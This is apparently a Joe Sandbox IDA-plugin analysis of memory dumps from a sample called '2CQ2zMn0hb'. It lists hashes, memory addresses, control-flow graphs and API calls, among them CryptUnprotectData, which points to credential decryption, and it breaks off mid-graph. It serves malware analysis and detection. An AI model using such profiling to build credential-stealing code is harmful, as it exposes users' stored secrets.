                                                                                                              • Opcode Fuzzy Hash: a554dbcebaabaa4f51c6415d88becc079abade110435ed80829e1ea11b5f5cfa
                                                                                                              • Instruction Fuzzy Hash: 0072D274A01218CFDB25DF64D994BA9B7B2FF89301F1084E9D809673A5CB35AE82CF54
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(00000062,?,00000000,?,?,?,?), ref: 348ADA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: d7779444ebf9d1f04c985b3f25a68a3664e5f32a8a4d43852ce443850f91f973
                                                                                                              • Instruction ID: 20589766eeee9bee068f40cbcd0cf7ad0790343576745dda56f5bd0ad6bef2fe
                                                                                                              • Opcode Fuzzy Hash: d7779444ebf9d1f04c985b3f25a68a3664e5f32a8a4d43852ce443850f91f973
                                                                                                              • Instruction Fuzzy Hash: 7E115BB6800249DFCB10CF99C944BDEBFF5EF88320F148419E659A7211C379A590DFA1
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(00000062,?,00000000,?,?,?,?), ref: 348ADA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: c601a3e41a31957c8654277920f201d7b791b3ddfc58830763b89021be840b01
                                                                                                              • Instruction ID: 5bfc6b385a1c4dad9c131a612b6edf6da5a2a509595b77d46ef10108bc9f4fd3
                                                                                                              • Opcode Fuzzy Hash: c601a3e41a31957c8654277920f201d7b791b3ddfc58830763b89021be840b01
                                                                                                              • Instruction Fuzzy Hash: 481147B28002499FCB10CF99C405BEEBBF5EB48320F148419E618A7210C379A590CFA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ]4
                                                                                                              • API String ID: 0-1124688747
                                                                                                              • Opcode ID: 4bf9123073ee0a62932c5fc1975718982a6e496253bfe2e03400dc8ff1b32c68
                                                                                                              • Instruction ID: 43da0689a0a2c8e227babe408f7052b943e226f3e3a0af804ce51e27c500b445
                                                                                                              • Opcode Fuzzy Hash: 4bf9123073ee0a62932c5fc1975718982a6e496253bfe2e03400dc8ff1b32c68
                                                                                                              • Instruction Fuzzy Hash: 12A10374E00208CFEB14DFA9C594BDDBBB1FF89304F209269E408AB2A1DB759985CF55
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ]4
                                                                                                              • API String ID: 0-1124688747
                                                                                                              • Opcode ID: 529e3d0fcd8d6853f546c33dce7a6f642e35c1c5445d21342c977b83346684dc
                                                                                                              • Instruction ID: c483132f9f0055b87aa2c3ae6ad76ddadae17d6156aeb45fb2da7d8163da3fc2
                                                                                                              • Opcode Fuzzy Hash: 529e3d0fcd8d6853f546c33dce7a6f642e35c1c5445d21342c977b83346684dc
                                                                                                              • Instruction Fuzzy Hash: C5A1F274D00208CFEB14DFA9C994BDDBBB1FF89314F208269E408AB2A1DB749985CF55
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^7
                                                                                                              • API String ID: 0-4112476546
                                                                                                              • Opcode ID: 406f7d396131f99d0cd09faec26f457fdba45ae24a950f5f995914f71199a6b2
                                                                                                              • Instruction ID: ef98122db19ca78e27230633aad149dc8e1bbc1a9d9db4c0a57c76a545434e03
                                                                                                              • Opcode Fuzzy Hash: 406f7d396131f99d0cd09faec26f457fdba45ae24a950f5f995914f71199a6b2
                                                                                                              • Instruction Fuzzy Hash: B6A1A0B4E012288FEB14CF6AC954B9DBBF2BF89304F14C1AAD408A7261DB345A85CF11
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^7
                                                                                                              • API String ID: 0-4112476546
                                                                                                              • Opcode ID: a397d8086f8fd8419bb908b045406726049f92301206bfa13ef86e576361331b
                                                                                                              • Instruction ID: a0212d45daefdb374950a94431632c6c63d5338850319a3c969012a12f5965aa
                                                                                                              • Opcode Fuzzy Hash: a397d8086f8fd8419bb908b045406726049f92301206bfa13ef86e576361331b
                                                                                                              • Instruction Fuzzy Hash: EBA191B5E012188FEB14CF6AC994B9DFBF2AF89310F14C0AAD408B7265DB345A85CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^7
                                                                                                              • API String ID: 0-4112476546
                                                                                                              • Opcode ID: e18734d3a15a80fcf1ca3b4db71289307d636e023cc5564b4dc5973e5082230a
                                                                                                              • Instruction ID: 24931c68861761fb757d6cbff779fd26724d51a0b9885724cd3fae684d0628a6
                                                                                                              • Opcode Fuzzy Hash: e18734d3a15a80fcf1ca3b4db71289307d636e023cc5564b4dc5973e5082230a
                                                                                                              • Instruction Fuzzy Hash: 8BA190B5E012188FEB58CF6AC944B9DBBF2BF89304F14C1AAD409A7265DB345A85CF11
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^7
                                                                                                              • API String ID: 0-4112476546
                                                                                                              • Opcode ID: 244d7555895a5c725333bc3c7376eb4a6003f96c1a331a874e1d4605a2fc3b40
                                                                                                              • Instruction ID: 562f8c7ede6ba06fa3ab8c5d4c90ebf0ceb605cdb7f333e2add761ab253d5b73
                                                                                                              • Opcode Fuzzy Hash: 244d7555895a5c725333bc3c7376eb4a6003f96c1a331a874e1d4605a2fc3b40
                                                                                                              • Instruction Fuzzy Hash: 0FA180B4E012188FEB54CF6AC994B9DBBF2BF89300F14C1AAD409B7265DB345A85CF51
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^7
                                                                                                              • API String ID: 0-4112476546
                                                                                                              • Opcode ID: e39696fec129c8714e33864c385951ff09841365e5bd120c94bc7310057e7555
                                                                                                              • Instruction ID: c8cd44b657db8da42ab67dea468fe1314a11bd6133e43cc31d5be62bc01b0634
                                                                                                              • Opcode Fuzzy Hash: e39696fec129c8714e33864c385951ff09841365e5bd120c94bc7310057e7555
                                                                                                              • Instruction Fuzzy Hash: 0E8194B4E016188FEB58CF6AC954B9DFBF2AF89200F14C1EAD40DA7265DB345A85CF11
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0^7
                                                                                                              • API String ID: 0-4112476546
                                                                                                              • Opcode ID: 211fb799be8e225dda834b0e2a75d801fedee735a57fd7d63865aea647f9b78d
                                                                                                              • Instruction ID: 0df9c4587132ffd1c003101f8671091ae2dc9f0cf08d39754f6b115f18d82c5e
                                                                                                              • Opcode Fuzzy Hash: 211fb799be8e225dda834b0e2a75d801fedee735a57fd7d63865aea647f9b78d
                                                                                                              • Instruction Fuzzy Hash: 8171A3B5E016188FEB58CF66C944B99FBF2AF88304F14C1AAD40CB7265DB345A85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ad63a367b4977b0676ffcef776ed65b4850e4059a292fdf8e4922bccfc60c172
                                                                                                              • Instruction ID: 5c079a884d2823718ded3e22e6184936d601ed30a56186d03c96cbfd34e02a7b
                                                                                                              • Opcode Fuzzy Hash: ad63a367b4977b0676ffcef776ed65b4850e4059a292fdf8e4922bccfc60c172
                                                                                                              • Instruction Fuzzy Hash: B5826A74E012298FDB64DF69DD94BD9BBB2BF89300F1081E9984DA7261DB306E85CF41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54a50074e817937d6f7531711c3b2325cfce2efa564ca2f814bd0a8466a1fbce
                                                                                                              • Instruction ID: d107031cec281d7b3b8a6d2bb7e151656ed0dc98791b67be50370b467aa6b8c3
                                                                                                              • Opcode Fuzzy Hash: 54a50074e817937d6f7531711c3b2325cfce2efa564ca2f814bd0a8466a1fbce
                                                                                                              • Instruction Fuzzy Hash: 6A72CF74E012298FEB65CF69C990BD9BBB2BF49301F5091E9D409A7361DB34AE81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d1999fb303fbfbf06c7d6a4ed51696134d6bb4a3e02757dcac51b058fb0ed18
                                                                                                              • Instruction ID: a60fdeee3d186961852c1b58d9d251101ac65c8131a28735697a905a5c156097
                                                                                                              • Opcode Fuzzy Hash: 0d1999fb303fbfbf06c7d6a4ed51696134d6bb4a3e02757dcac51b058fb0ed18
                                                                                                              • Instruction Fuzzy Hash: 64E1C274E01218CFEB54CFA9D984B9DBBB2BF49300F2081A9D419B73A1DB755A86CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 61b8a25c4e9ab9e95b0d1f760524175495c8e9fae4c8461ced7d3e2af8945cd8
                                                                                                              • Instruction ID: f15ccea35a58e9cf9f785b03e118a69e2ddbc662db415d6d4265954e808c431f
                                                                                                              • Opcode Fuzzy Hash: 61b8a25c4e9ab9e95b0d1f760524175495c8e9fae4c8461ced7d3e2af8945cd8
                                                                                                              • Instruction Fuzzy Hash: AFC1AE74E01218CFDB54DFA5D994B9DBBB2FF89300F1081A9D809A73A5DB359A86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb7e867572505952dedade22782af11fd7171e5f3ba0e95cf0fca7ed53de7158
                                                                                                              • Instruction ID: d994d4822d537708e4d4e71466c2a907ce6c514992d549b8c652d024ede945b8
                                                                                                              • Opcode Fuzzy Hash: fb7e867572505952dedade22782af11fd7171e5f3ba0e95cf0fca7ed53de7158
                                                                                                              • Instruction Fuzzy Hash: BB91D074E00218CFEB10DFA8C994B9CBBB1FF49315F209269E409BB291DBB59985CF15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: de1a3d07a71a081fc9a08c662e4a27fd808397c50f514baf7ee25d2850942dda
                                                                                                              • Instruction ID: db42ded18169a57bdc7bf9be742a473549292d47424e0addea9e5b6a77a00148
                                                                                                              • Opcode Fuzzy Hash: de1a3d07a71a081fc9a08c662e4a27fd808397c50f514baf7ee25d2850942dda
                                                                                                              • Instruction Fuzzy Hash: 47810674E01208CBEB14DFA9D9506DDBBF2BF88310F64D529D418AB365DB349942CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d0763dd30b19577fc9b511dbbeee3fdce587ba8b2157f549fba43fba57f31a92
                                                                                                              • Instruction ID: 9d886cf95f6179f3f7c587c0bc6708efe048de6156d9a5fcd0d75b2842dd2e60
                                                                                                              • Opcode Fuzzy Hash: d0763dd30b19577fc9b511dbbeee3fdce587ba8b2157f549fba43fba57f31a92
                                                                                                              • Instruction Fuzzy Hash: 8C71C475D02229CFDB24CF66D9847DDBBB2BF89311F1091AAD408A7360DB346A82CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 074f94d8a07f27f4218629830c7558c146b22786a044e7f345ec0ace5c913195
                                                                                                              • Instruction ID: a71d23ef54e8500f3c5c0a845762ba209031826371cea575f87fec7dd5b55be6
                                                                                                              • Opcode Fuzzy Hash: 074f94d8a07f27f4218629830c7558c146b22786a044e7f345ec0ace5c913195
                                                                                                              • Instruction Fuzzy Hash: FF614674A40219CFDB25DF64E994BADFBB6FF88300F1084A99809637A5DE356D82DF04
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74e8e9267378b7bf7b74f3373982d27e09b60e7c56b87484f029268fb4f5ca9e
                                                                                                              • Instruction ID: ee151345ca72b22f97fe7cda2321a0d9b349486c1e78df8fcc2e858ae3227311
                                                                                                              • Opcode Fuzzy Hash: 74e8e9267378b7bf7b74f3373982d27e09b60e7c56b87484f029268fb4f5ca9e
                                                                                                              • Instruction Fuzzy Hash: 8F418AB1D016188BEB58CF6BCD557C9FAF3AFC9314F04C1AAD40CA6265EB740A868F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a37ab78b365a65268223a8372b94474dbae985a37b41f777fb1dc6838425011
                                                                                                              • Instruction ID: 4e38de608f6f765d923c0e08b72c18a9cab6f89bbc5f23b0dd004abfd1433f1b
                                                                                                              • Opcode Fuzzy Hash: 1a37ab78b365a65268223a8372b94474dbae985a37b41f777fb1dc6838425011
                                                                                                              • Instruction Fuzzy Hash: D24169B1D016189BEB58CF6BCD457CAFAF3AFC8310F04C1AAD50CA6265DB740A868F51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 915 37b60980-37b60a0f GetCurrentProcess 919 37b60a11-37b60a17 915->919 920 37b60a18-37b60a4c GetCurrentThread 915->920 919->920 921 37b60a55-37b60a89 GetCurrentProcess 920->921 922 37b60a4e-37b60a54 920->922 924 37b60a92-37b60aaa 921->924 925 37b60a8b-37b60a91 921->925 922->921 936 37b60aad call 37b60f31 924->936 937 37b60aad call 37b60b4f 924->937 925->924 928 37b60ab3-37b60ae2 GetCurrentThreadId 929 37b60ae4-37b60aea 928->929 930 37b60aeb-37b60b4d 928->930 929->930 936->928 937->928
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 37B609FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 37B60A3B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 37B60A78
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 37B60AD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 84d51434cc7fcd924bde4268f39c76653107073f0c6812dd7c10da6a112dc6d3
                                                                                                              • Instruction ID: d96c418490fd7766c7584a4b3180466a771e602d9c86a1bf19f4b665ba93ed41
                                                                                                              • Opcode Fuzzy Hash: 84d51434cc7fcd924bde4268f39c76653107073f0c6812dd7c10da6a112dc6d3
                                                                                                              • Instruction Fuzzy Hash: EC5166B0A006099FDB44DFAAC548BAEBBF5EF48314F208459E159A7361D738A980CF65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 938 3763d548-3763d66d 957 3763d673-3763d6b9 938->957 958 3763d710-3763d741 938->958 963 3763d6c4-3763d70f 957->963 964 3763d6bb-3763d6bf 957->964 965 3763d747-3763d75e 958->965 964->963
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4']q$4']q$dr7$)_7
                                                                                                              • API String ID: 0-2804609785
                                                                                                              • Opcode ID: ca9f6d6151774a99df1f7947e96b9ed6d9c57c48bef0c723f22e17633834c7a1
                                                                                                              • Instruction ID: 800b1022d79f6e034a214f275dbd4c5fc3ad1f780ac211b966a8c928a0f221da
                                                                                                              • Opcode Fuzzy Hash: ca9f6d6151774a99df1f7947e96b9ed6d9c57c48bef0c723f22e17633834c7a1
                                                                                                              • Instruction Fuzzy Hash: 47518270A002099FCB05EFA8D951AEEBBB2FF85300F108565D046BB366DB35AE45CF61

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1032 37637920-37637941 1033 37637943 1032->1033 1034 37637948-3763797e 1032->1034 1033->1034 1037 37637987-376379ae 1034->1037 1039 376379b4-376379cc 1037->1039 1040 37637b3d-37637b46 1037->1040 1043 37637ae8-37637b03 1039->1043 1045 376379d1-37637ae7 1043->1045 1046 37637b09-37637b2d 1043->1046 1045->1043
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: <C7$<C7$<C7
                                                                                                              • API String ID: 0-2435148349
                                                                                                              • Opcode ID: 91add3d1d1fa68d308dd9617e12d63132576583094770ee512bc4782090adb7b
                                                                                                              • Instruction ID: 6200d98cffc38cef7bd81ba54d681b40869d8a181e3d1e0f9e916a0e26a8afd1
                                                                                                              • Opcode Fuzzy Hash: 91add3d1d1fa68d308dd9617e12d63132576583094770ee512bc4782090adb7b
                                                                                                              • Instruction Fuzzy Hash: EF512574D01318DFDB14DFA5D994AADBBB2FF88300F208529E809AB365DB356946CF41

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1629 164f00-164f22 1630 164f24-164f28 1629->1630 1631 164f38-164f43 1629->1631 1634 164f50-164f57 1630->1634 1635 164f2a-164f36 1630->1635 1632 164feb-165017 1631->1632 1633 164f49-164f4b 1631->1633 1642 16501e-165076 1632->1642 1638 164fe3-164fe8 1633->1638 1636 164f77-164f80 1634->1636 1637 164f59-164f60 1634->1637 1635->1631 1635->1634 1732 164f82 call 164ef0 1636->1732 1733 164f82 call 164f00 1636->1733 1637->1636 1639 164f62-164f6d 1637->1639 1641 164f73-164f75 1639->1641 1639->1642 1641->1638 1661 165085-165097 1642->1661 1662 165078-16507e 1642->1662 1643 164f88-164f8a 1644 164f92-164f9a 1643->1644 1645 164f8c-164f90 1643->1645 1648 164f9c-164fa1 1644->1648 1649 164fa9-164fab 1644->1649 1645->1644 1647 164fad-164fcc 1645->1647 1655 164fe1 1647->1655 1656 164fce-164fd7 1647->1656 1648->1649 1649->1638 1655->1638 1730 164fd9 call 169eb0 1656->1730 1731 164fd9 call 169f6d 1656->1731 1658 164fdf 1658->1638 1664 16509d-1650a1 1661->1664 1665 16512b-16512f call 1652c8 1661->1665 1662->1661 1666 1650a3-1650af 1664->1666 1667 1650b1-1650be 1664->1667 1668 165135-16513b 1665->1668 1673 1650c0-1650ca 1666->1673 1667->1673 1671 165147-16514e 1668->1671 1672 16513d-165143 1668->1672 1674 165145 1672->1674 1675 1651a9-165208 1672->1675 1678 1650f7-1650fb 1673->1678 1679 1650cc-1650db 1673->1679 1674->1671 1688 16520f-165233 1675->1688 1680 165107-16510b 1678->1680 1681 1650fd-165103 1678->1681 1690 1650dd-1650e4 1679->1690 1691 1650eb-1650f5 1679->1691 1680->1671 1685 16510d-165111 1680->1685 1683 165105 1681->1683 1684 165151-1651a2 1681->1684 1683->1671 1684->1675 1687 165117-165129 1685->1687 1685->1688 1687->1671 1698 165235-165237 1688->1698 1699 165239-16523b 1688->1699 1690->1691 1691->1678 1700 1652b1-1652b4 1698->1700 1701 16524c-16524e 1699->1701 1702 16523d-165241 1699->1702 1708 165250-165254 1701->1708 1709 165261-165267 1701->1709 1706 165247-16524a 1702->1706 1707 165243-165245 1702->1707 1706->1700 1707->1700 1710 165256-165258 1708->1710 1711 16525a-16525f 1708->1711 1713 165292-165294 1709->1713 1714 165269-165290 1709->1714 1710->1700 1711->1700 1717 16529b-16529d 1713->1717 1714->1717 1720 1652a3-1652a5 1717->1720 1721 16529f-1652a1 1717->1721 1723 1652a7-1652ac 1720->1723 1724 1652ae 1720->1724 1721->1700 1723->1700 1724->1700 1730->1658 1731->1658 1732->1643 1733->1643
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Haq$Haq
                                                                                                              • API String ID: 0-4016896955
                                                                                                              • Opcode ID: 0e1009aff33eb54d5ea18a2396392a208350fffd9a4e06d9bdbe62934cfe6ce3
                                                                                                              • Instruction ID: 87d5a7edf0c24aa9d220fdf085374bb65d35074ca4fa86c6bdfc11fda9efba80
                                                                                                              • Opcode Fuzzy Hash: 0e1009aff33eb54d5ea18a2396392a208350fffd9a4e06d9bdbe62934cfe6ce3
                                                                                                              • Instruction Fuzzy Hash: 95B1DF343046518FDB199F38CC94B6A7BE3AF89304F15856AE846CB3A5CB34CD92DB91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1735 165460-16546d 1736 165475-165477 1735->1736 1737 16546f-165473 1735->1737 1739 165688-16568f 1736->1739 1737->1736 1738 16547c-165487 1737->1738 1740 165690 1738->1740 1741 16548d-165494 1738->1741 1744 165695-1656cd 1740->1744 1742 16549a-1654a9 1741->1742 1743 165629-16562f 1741->1743 1742->1744 1745 1654af-1654be 1742->1745 1746 165635-165639 1743->1746 1747 165631-165633 1743->1747 1763 1656d6-1656da 1744->1763 1764 1656cf-1656d4 1744->1764 1753 1654d3-1654d6 1745->1753 1754 1654c0-1654c3 1745->1754 1748 165686 1746->1748 1749 16563b-165641 1746->1749 1747->1739 1748->1739 1749->1740 1751 165643-165646 1749->1751 1751->1740 1755 165648-16565d 1751->1755 1758 1654e2-1654e8 1753->1758 1759 1654d8-1654db 1753->1759 1757 1654c5-1654c8 1754->1757 1754->1758 1770 165681-165684 1755->1770 1771 16565f-165665 1755->1771 1767 1654ce 1757->1767 1768 1655c9-1655cf 1757->1768 1765 165500-16551d 1758->1765 1766 1654ea-1654f0 1758->1766 1760 16552e-165534 1759->1760 1761 1654dd 1759->1761 1777 165536-16553c 1760->1777 1778 16554c-16555e 1760->1778 1769 1655f4-165601 1761->1769 1772 1656e0-1656e2 1763->1772 1764->1772 1808 165526-165529 1765->1808 1773 1654f4-1654fe 1766->1773 1774 1654f2 1766->1774 1767->1769 1775 1655e7-1655f1 1768->1775 1776 1655d1-1655d7 1768->1776 1794 165615-165617 1769->1794 1795 165603-165607 1769->1795 1770->1739 1781 165677-16567a 1771->1781 1782 165667-165675 1771->1782 1783 1656f7-1656fe 1772->1783 1784 1656e4-1656f6 1772->1784 1773->1765 1774->1765 1775->1769 1786 1655db-1655e5 1776->1786 1787 1655d9 1776->1787 1779 165540-16554a 1777->1779 1780 16553e 1777->1780 1798 165560-16556c 1778->1798 1799 16556e-165591 1778->1799 1779->1778 1780->1778 1781->1740 1790 16567c-16567f 1781->1790 1782->1740 1782->1781 1786->1775 1787->1775 1790->1770 1790->1771 1803 16561b-16561e 1794->1803 1795->1794 1802 165609-16560d 1795->1802 1809 1655b9-1655c7 1798->1809 1799->1740 1811 165597-16559a 1799->1811 1802->1740 1804 165613 